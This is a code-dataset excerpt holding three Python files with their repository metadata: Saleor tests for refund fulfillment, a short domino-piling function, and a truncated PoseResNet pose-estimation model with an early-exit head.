hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6710871400f55972cf1add7ad3bc2c48cbb9460b
| 9,314
|
py
|
Python
|
saleor/order/tests/test_order_actions_refund_products.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/order/tests/test_order_actions_refund_products.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/order/tests/test_order_actions_refund_products.py
|
aminziadna/saleor
|
2e78fb5bcf8b83a6278af02551a104cfa555a1fb
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from decimal import Decimal
from unittest.mock import ANY, patch
from ...payment import ChargeStatus
from ...plugins.manager import get_plugins_manager
from ...tests.utils import flush_post_commit_hooks
from ...warehouse.models import Allocation
from .. import FulfillmentLineData, FulfillmentStatus, OrderLineData
from ..actions import create_refund_fulfillment
from ..models import FulfillmentLine
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_only_order_lines(
    mocked_refund, mocked_order_updated, order_with_lines, payment_dummy
):
    """Refunding only order lines creates a REFUNDED fulfillment, lowers the
    unfulfilled quantities and allocations, and refunds the summed gross price."""
    # given: a fully charged payment attached to the order
    payment_dummy.captured_amount = payment_dummy.total
    payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
    payment_dummy.save()
    order_with_lines.payments.add(payment_dummy)
    payment = order_with_lines.get_last_payment()

    lines_to_refund = order_with_lines.lines.all()
    unfulfilled_before = {
        line.id: line.quantity_unfulfilled for line in order_with_lines.lines.all()
    }
    refunded_line_ids = lines_to_refund.values_list("id", flat=True)
    allocations_before = list(
        Allocation.objects.filter(order_line_id__in=refunded_line_ids)
    )
    expected_line_count = order_with_lines.lines.count()

    # when
    refund_fulfillment = create_refund_fulfillment(
        user=None,
        app=None,
        order=order_with_lines,
        payment=payment,
        order_lines_to_refund=[
            OrderLineData(line=line, quantity=2) for line in lines_to_refund
        ],
        fulfillment_lines_to_refund=[],
        manager=get_plugins_manager(),
    )
    flush_post_commit_hooks()

    # then
    created_lines = refund_fulfillment.lines.all()
    assert refund_fulfillment.status == FulfillmentStatus.REFUNDED
    assert len(created_lines) == expected_line_count
    for created_line in created_lines:
        assert created_line.quantity == 2
        assert created_line.order_line_id in refunded_line_ids
    for line in lines_to_refund:
        assert line.quantity_unfulfilled == unfulfilled_before.get(line.pk) - 2
    allocations_after = Allocation.objects.in_bulk(
        [allocation.pk for allocation in allocations_before]
    )
    for old_allocation in allocations_before:
        new_allocation = allocations_after.get(old_allocation.pk)
        assert (
            old_allocation.quantity_allocated - 2
            == new_allocation.quantity_allocated
        )
    amount = sum(line.unit_price_gross_amount * 2 for line in lines_to_refund)
    assert refund_fulfillment.total_refund_amount == amount
    assert refund_fulfillment.shipping_refund_amount is None
    mocked_refund.assert_called_once_with(
        payment_dummy, ANY, amount=amount, channel_slug=order_with_lines.channel.slug
    )
    mocked_order_updated.assert_called_once_with(order_with_lines)
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_included_shipping_costs(
    mocked_refund, mocked_order_updated, order_with_lines, payment_dummy
):
    """With ``refund_shipping_costs=True`` the shipping gross price is added
    to the refunded amount and recorded on the fulfillment."""
    # given: a fully charged payment attached to the order
    payment_dummy.captured_amount = payment_dummy.total
    payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
    payment_dummy.save()
    order_with_lines.payments.add(payment_dummy)
    payment = order_with_lines.get_last_payment()

    lines_to_refund = order_with_lines.lines.all()
    unfulfilled_before = {
        line.id: line.quantity_unfulfilled for line in order_with_lines.lines.all()
    }
    refunded_line_ids = lines_to_refund.values_list("id", flat=True)
    expected_line_count = order_with_lines.lines.count()

    # when
    refund_fulfillment = create_refund_fulfillment(
        user=None,
        app=None,
        order=order_with_lines,
        payment=payment,
        order_lines_to_refund=[
            OrderLineData(line=line, quantity=2) for line in lines_to_refund
        ],
        fulfillment_lines_to_refund=[],
        manager=get_plugins_manager(),
        refund_shipping_costs=True,
    )
    flush_post_commit_hooks()

    # then
    created_lines = refund_fulfillment.lines.all()
    assert refund_fulfillment.status == FulfillmentStatus.REFUNDED
    assert len(created_lines) == expected_line_count
    for created_line in created_lines:
        assert created_line.quantity == 2
        assert created_line.order_line_id in refunded_line_ids
    for line in lines_to_refund:
        assert line.quantity_unfulfilled == unfulfilled_before.get(line.pk) - 2
    amount = sum(line.unit_price_gross_amount * 2 for line in lines_to_refund)
    amount += order_with_lines.shipping_price_gross_amount
    assert refund_fulfillment.total_refund_amount == amount
    assert (
        refund_fulfillment.shipping_refund_amount
        == order_with_lines.shipping_price_gross_amount
    )
    mocked_refund.assert_called_once_with(
        payment_dummy, ANY, amount=amount, channel_slug=order_with_lines.channel.slug
    )
    mocked_order_updated.assert_called_once_with(order_with_lines)
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_only_fulfillment_lines(
    mocked_refund, mocked_order_updated, fulfilled_order, payment_dummy
):
    """Refunding already-fulfilled lines decreases their fulfillment
    quantities and refunds the summed gross price of the order lines."""
    # given: a fully charged payment attached to the fulfilled order
    payment_dummy.captured_amount = payment_dummy.total
    payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
    payment_dummy.save()
    fulfilled_order.payments.add(payment_dummy)
    payment = fulfilled_order.get_last_payment()

    order_line_ids = fulfilled_order.lines.all().values_list("id", flat=True)
    fulfillment_lines = FulfillmentLine.objects.filter(order_line_id__in=order_line_ids)
    # Evaluating the comprehension caches the queryset; later iterations see
    # the same in-memory objects, which the action mutates in place.
    quantity_before = {line.id: line.quantity for line in fulfillment_lines}

    # when
    refund_fulfillment = create_refund_fulfillment(
        user=None,
        app=None,
        order=fulfilled_order,
        payment=payment,
        order_lines_to_refund=[],
        fulfillment_lines_to_refund=[
            FulfillmentLineData(line=line, quantity=2)
            for line in fulfillment_lines
        ],
        manager=get_plugins_manager(),
    )
    flush_post_commit_hooks()

    # then
    created_lines = refund_fulfillment.lines.all()
    assert refund_fulfillment.status == FulfillmentStatus.REFUNDED
    assert len(created_lines) == len(order_line_ids)
    for created_line in created_lines:
        assert created_line.quantity == 2
        assert created_line.order_line_id in order_line_ids
    for line in fulfillment_lines:
        assert line.quantity == quantity_before.get(line.pk) - 2
    amount = sum(
        line.order_line.unit_price_gross_amount * 2 for line in fulfillment_lines
    )
    mocked_refund.assert_called_once_with(
        payment_dummy, ANY, amount=amount, channel_slug=fulfilled_order.channel.slug
    )
    mocked_order_updated.assert_called_once_with(fulfilled_order)
    assert refund_fulfillment.total_refund_amount == amount
    assert refund_fulfillment.shipping_refund_amount is None
@patch("saleor.plugins.manager.PluginsManager.order_updated")
@patch("saleor.order.actions.gateway.refund")
def test_create_refund_fulfillment_custom_amount(
    mocked_refund, mocked_order_updated, fulfilled_order, payment_dummy
):
    """An explicit ``amount`` argument overrides the computed refund total."""
    # given: a fully charged payment attached to the fulfilled order
    payment_dummy.captured_amount = payment_dummy.total
    payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
    payment_dummy.save()
    fulfilled_order.payments.add(payment_dummy)
    payment = fulfilled_order.get_last_payment()

    order_line_ids = fulfilled_order.lines.all().values_list("id", flat=True)
    fulfillment_lines = FulfillmentLine.objects.filter(order_line_id__in=order_line_ids)
    quantity_before = {line.id: line.quantity for line in fulfillment_lines}
    amount = Decimal("10.00")

    # when
    refund_fulfillment = create_refund_fulfillment(
        user=None,
        app=None,
        order=fulfilled_order,
        payment=payment,
        order_lines_to_refund=[],
        fulfillment_lines_to_refund=[
            FulfillmentLineData(line=line, quantity=2)
            for line in fulfillment_lines
        ],
        manager=get_plugins_manager(),
        amount=amount,
    )
    flush_post_commit_hooks()

    # then
    created_lines = refund_fulfillment.lines.all()
    assert refund_fulfillment.status == FulfillmentStatus.REFUNDED
    assert len(created_lines) == len(order_line_ids)
    for created_line in created_lines:
        assert created_line.quantity == 2
        assert created_line.order_line_id in order_line_ids
    for line in fulfillment_lines:
        assert line.quantity == quantity_before.get(line.pk) - 2
    mocked_refund.assert_called_once_with(
        payment_dummy, ANY, amount=amount, channel_slug=fulfilled_order.channel.slug
    )
    mocked_order_updated.assert_called_once_with(fulfilled_order)
    assert refund_fulfillment.total_refund_amount == amount
    assert refund_fulfillment.shipping_refund_amount is None
| 41.030837
| 88
| 0.761434
| 1,148
| 9,314
| 5.777003
| 0.086237
| 0.072376
| 0.043124
| 0.037998
| 0.889777
| 0.889777
| 0.885856
| 0.885856
| 0.885856
| 0.860676
| 0
| 0.002579
| 0.167275
| 9,314
| 226
| 89
| 41.212389
| 0.852501
| 0
| 0
| 0.778894
| 0
| 0
| 0.038329
| 0.036934
| 0
| 0
| 0
| 0
| 0.18593
| 1
| 0.020101
| false
| 0
| 0.045226
| 0
| 0.065327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1db6db60fb5659ad7667ae2eaa91acd20ecfb6b
| 119
|
py
|
Python
|
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
sorting/domino_piling.py
|
elenaborisova/A2SV-interview-prep
|
02b7166a96d22221cd6adaedf14f845537f0752d
|
[
"MIT"
] | null | null | null |
def domino_piling(m, n):
    """Return the maximum number of 2x1 dominoes that fit on an m x n board.

    Each domino covers exactly two cells, so the answer is the cell count
    halved (one cell stays empty when m * n is odd).
    """
    board_cells = m * n
    return board_cells // 2


# Test cases:
print(domino_piling(3, 3))
print(domino_piling(2, 4))
| 14.875
| 26
| 0.638655
| 21
| 119
| 3.47619
| 0.571429
| 0.493151
| 0.465753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 0.184874
| 119
| 7
| 27
| 17
| 0.701031
| 0.092437
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
c021064b1f7e59319e1690324538dc33a2bdc46b
| 39,248
|
py
|
Python
|
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | 1
|
2021-12-01T15:22:44.000Z
|
2021-12-01T15:22:44.000Z
|
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | null | null | null |
Train/pose_estimation/lib/models/pose_resnet.py
|
ZSL98/ETBA
|
618317698adb9e372fb11dc0c3a01f856e0759b0
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import copy
import torch
import torch.nn as nn
from collections import OrderedDict
import sys
sys.path.append("/home/slzhang/projects/ETBA/Inference/src/exit_placement")
from networks import backbone_s1, backbone_s2, Bottleneck
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution; padding=1 keeps spatial size
    (unless ``stride`` downsamples)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Two 3x3 conv/BN stages with ReLU and an additive residual shortcut.

    ``downsample`` (if given) projects the input so it matches the main
    branch's shape before the addition; ``stride`` downsamples in conv1.
    """

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Main branch: conv-bn-relu, conv-bn.
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.bn2(self.conv2(y))
        # Shortcut branch (projected when shapes differ).
        shortcut = x if self.downsample is None else self.downsample(x)
        y += shortcut
        return self.relu(y)
# class Bottleneck(nn.Module):
# expansion = 4
# def __init__(self, inplanes, planes, stride=1, downsample=None):
# super(Bottleneck, self).__init__()
# self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
# self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
# self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
# padding=1, bias=False)
# self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
# self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
# bias=False)
# self.bn3 = nn.BatchNorm2d(planes * self.expansion,
# momentum=BN_MOMENTUM)
# self.relu = nn.ReLU(inplace=True)
# self.downsample = downsample
# self.stride = stride
# def forward(self, x):
# residual = x
# out = self.conv1(x)
# out = self.bn1(out)
# out = self.relu(out)
# out = self.conv2(out)
# out = self.bn2(out)
# out = self.relu(out)
# out = self.conv3(out)
# out = self.bn3(out)
# if self.downsample is not None:
# residual = self.downsample(x)
# out += residual
# out = self.relu(out)
# return out
class Bottleneck_CAFFE(nn.Module):
    """Caffe-style ResNet bottleneck (1x1 -> 3x3 -> 1x1 with residual add).

    Unlike the torchvision bottleneck, the spatial stride is applied on the
    first 1x1 reduction conv instead of the 3x3 conv.
    """

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck_CAFFE, self).__init__()
        # add stride to conv1x1
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, stride=stride, bias=False)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
                               bias=False)
        self.bn3 = nn.BatchNorm2d(planes * self.expansion,
                                  momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Reduce -> transform -> expand, each followed by BN.
        y = self.relu(self.bn1(self.conv1(x)))
        y = self.relu(self.bn2(self.conv2(y)))
        y = self.bn3(self.conv3(y))
        # Residual shortcut, projected when shapes differ.
        shortcut = x
        if self.downsample is not None:
            shortcut = self.downsample(x)
        y += shortcut
        return self.relu(y)
class PoseResNet(nn.Module):
    """ResNet backbone followed by a deconvolutional head that outputs
    per-joint heatmaps.

    Args:
        block: residual block class (e.g. ``BasicBlock``); must expose an
            ``expansion`` class attribute.
        layers: per-stage block counts for the four ResNet stages.
        cfg: experiment config; reads ``cfg.MODEL.EXTRA`` (deconv head
            layout) and ``cfg.MODEL.NUM_JOINTS`` (output channels).
    """

    def __init__(self, block, layers, cfg, **kwargs):
        self.inplanes = 64
        extra = cfg.MODEL.EXTRA
        self.deconv_with_bias = extra.DECONV_WITH_BIAS

        super(PoseResNet, self).__init__()
        # Standard ResNet stem: 7x7/2 conv + 3x3/2 max-pool.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2)

        # used for deconv layers
        self.deconv_layers = self._make_deconv_layer(
            extra.NUM_DECONV_LAYERS,
            extra.NUM_DECONV_FILTERS,
            extra.NUM_DECONV_KERNELS,
        )

        # 1x1 (or 3x3) conv mapping deconv features to one heatmap per joint.
        self.final_layer = nn.Conv2d(
            in_channels=extra.NUM_DECONV_FILTERS[-1],
            out_channels=cfg.MODEL.NUM_JOINTS,
            kernel_size=extra.FINAL_CONV_KERNEL,
            stride=1,
            padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
        )

    def _make_layer(self, block, planes, blocks, stride=1):
        """Build one ResNet stage of ``blocks`` residual blocks.

        The first block gets the stride and (when shapes change) a 1x1
        projection shortcut; the rest keep resolution and channels.
        """
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
            )

        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))

        return nn.Sequential(*layers)

    def _get_deconv_cfg(self, deconv_kernel, index):
        """Return (kernel, padding, output_padding) so a stride-2
        ConvTranspose2d exactly doubles the spatial resolution."""
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0
        else:
            # BUGFIX: previously an unsupported kernel size fell through and
            # crashed with UnboundLocalError; fail with an explicit message.
            raise ValueError(
                'Unsupported deconv kernel size: {}'.format(deconv_kernel))

        return deconv_kernel, padding, output_padding

    def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
        """Build ``num_layers`` stride-2 deconv blocks (ConvTranspose2d +
        BN + ReLU), each doubling the spatial resolution."""
        assert num_layers == len(num_filters), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        assert num_layers == len(num_kernels), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'

        layers = []
        for i in range(num_layers):
            kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)

            planes = num_filters[i]
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=self.inplanes,
                    out_channels=planes,
                    kernel_size=kernel,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=self.deconv_with_bias))
            layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
            layers.append(nn.ReLU(inplace=True))
            self.inplanes = planes

        return nn.Sequential(*layers)

    def forward(self, x):
        # Backbone: stem then four residual stages.
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        # Head: upsample with deconvs, then predict heatmaps.
        x = self.deconv_layers(x)
        x = self.final_layer(x)
        return x

    def init_weights(self, pretrained=''):
        """Initialize the deconv/final layers and load backbone weights from
        the checkpoint file ``pretrained`` (non-strict, DataParallel-aware).

        Raises:
            ValueError: if ``pretrained`` is not an existing file.
            RuntimeError: if the checkpoint contains no state dict.
        """
        if os.path.isfile(pretrained):
            logger.info('=> init deconv weights from normal distribution')
            for name, m in self.deconv_layers.named_modules():
                if isinstance(m, nn.ConvTranspose2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    if self.deconv_with_bias:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    logger.info('=> init {}.weight as 1'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> init final conv weights from normal distribution')
            # BUGFIX: the original iterated ``self.final_layer.modules()`` and
            # logged the stale ``name`` left over from the loop above; use
            # named_modules() so the logged name matches the module.
            for name, m in self.final_layer.named_modules():
                if isinstance(m, nn.Conv2d):
                    # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    nn.init.constant_(m.bias, 0)

            # pretrained_state_dict = torch.load(pretrained)
            logger.info('=> loading pretrained model {}'.format(pretrained))
            # self.load_state_dict(pretrained_state_dict, strict=False)
            checkpoint = torch.load(pretrained)
            if isinstance(checkpoint, OrderedDict):
                state_dict = checkpoint
            elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
                state_dict_old = checkpoint['state_dict']
                state_dict = OrderedDict()
                # delete 'module.' because it is saved from DataParallel module
                for key in state_dict_old.keys():
                    if key.startswith('module.'):
                        state_dict[key[7:]] = state_dict_old[key]
                    else:
                        state_dict[key] = state_dict_old[key]
            else:
                raise RuntimeError(
                    'No state_dict found in checkpoint file {}'.format(pretrained))
            self.load_state_dict(state_dict, strict=False)
        else:
            # Typo fixed ('dose' -> 'does') to match the ValueError below.
            logger.error('=> imagenet pretrained model does not exist')
            logger.error('=> please download it first')
            raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthExit(nn.Module):
    """Pose network with an early-exit branch.

    The split backbone ``backbone_s1`` returns both the final feature map and
    an intermediate "exit" feature map; each gets its own deconv + final-conv
    head, so ``forward`` yields two heatmap tensors.
    """

    def __init__(self, block, layers, cfg, start_point, **kwargs):
        super(PoseResNetwthExit, self).__init__()
        extra = cfg.MODEL.EXTRA
        self.deconv_with_bias = extra.DECONV_WITH_BIAS
        self.backbone_s1 = backbone_s1(start_point=start_point, end_point=33)
        # self.backbone_s2 = backbone_s2(start_point=start_point, end_point=start_point)

        # Main head. ``inplanes`` is bookkeeping consumed by
        # _make_deconv_layer; reset before each head is built.
        self.inplanes = 2048
        self.deconv_layers = self._make_deconv_layer(
            extra.NUM_DECONV_LAYERS,
            extra.NUM_DECONV_FILTERS,
            extra.NUM_DECONV_KERNELS,
        )
        self.final_layer = nn.Conv2d(
            in_channels=extra.NUM_DECONV_FILTERS[-1],
            out_channels=cfg.MODEL.NUM_JOINTS,
            kernel_size=extra.FINAL_CONV_KERNEL,
            stride=1,
            padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
        )

        # Early-exit head, same layout as the main head.
        self.inplanes = 2048
        self.head_deconv_layers = self._make_deconv_layer(
            extra.NUM_DECONV_LAYERS,
            extra.NUM_DECONV_FILTERS,
            extra.NUM_DECONV_KERNELS,
        )
        self.head_final_layer = nn.Conv2d(
            in_channels=extra.NUM_DECONV_FILTERS[-1],
            out_channels=cfg.MODEL.NUM_JOINTS,
            kernel_size=extra.FINAL_CONV_KERNEL,
            stride=1,
            padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
        )

    def _get_deconv_cfg(self, deconv_kernel, index):
        """Return (kernel, padding, output_padding) so a stride-2
        ConvTranspose2d exactly doubles the spatial resolution."""
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0
        else:
            # BUGFIX: previously an unsupported kernel size fell through and
            # crashed with UnboundLocalError; fail with an explicit message.
            raise ValueError(
                'Unsupported deconv kernel size: {}'.format(deconv_kernel))

        return deconv_kernel, padding, output_padding

    def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
        """Build ``num_layers`` stride-2 deconv blocks (ConvTranspose2d +
        BN + ReLU), each doubling the spatial resolution."""
